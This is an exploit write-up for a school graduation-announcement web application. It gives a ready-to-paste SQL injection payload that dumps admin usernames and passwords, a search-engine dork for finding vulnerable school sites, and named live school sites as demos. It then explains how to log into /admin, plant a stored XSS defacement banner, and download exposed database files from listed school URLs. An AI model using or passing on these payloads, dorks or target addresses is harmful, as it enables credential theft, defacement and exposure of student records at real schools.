#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
#Date: 2020-09-09
#Exploit Author: Gh05t666nero
#Vendor Homepage: https://github.com/slametbsan
#Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan
#Category: webapps
#Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01)
#Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip
#############################################
[*] SQL Injection
#Query:
Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8#
#Demo:
Demo 1: http://pengumuman.smkn1nabire.sch.id
Demo 2: http://smkn2bulik.sch.id/kelulusan
Demo 3: http://smkn2sampang.sch.id/kelulusan/19
#Proof of Concept:
Do a search using the dork provided above, then do the vulnerability exploitation using the Query that I have listed above.
Copy the Query and paste it in the form section in the middle of the page then submit the Query code, it will automatically dump the username|password that is in the site's database.
#Login Page:
For the login page section, just add the path /admin
#############################################
[*] Cross Site Scripting [STORED]
#Payload:
<br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1>
#Proof of concept:
Enter the admin dashboard using the credentials from the SQL vulnerability exploitation that I described above then enter the Konfigurasi menu. Before entering the XSS Payload, click the Edit button first.
After that, please enter the XSS Payload on the Nama Sekolah form then click the save button, the Payload will be executed and stored.
#############################################
[*] Database Information Disclosure
#Example Bug:
http://www.mikrotik.smkn3garut.sch.id/un2016.sql
http://smkn2bulik.sch.id/kelulusan/un2016.sql
http://kelulusan.smkn1jati.sch.id/un2016.sql
#############################################
Contact Me:- gh05t666nero@gmail.com
Instagram:- @ojan_xploit
Telegram:- @Gh05t666nero1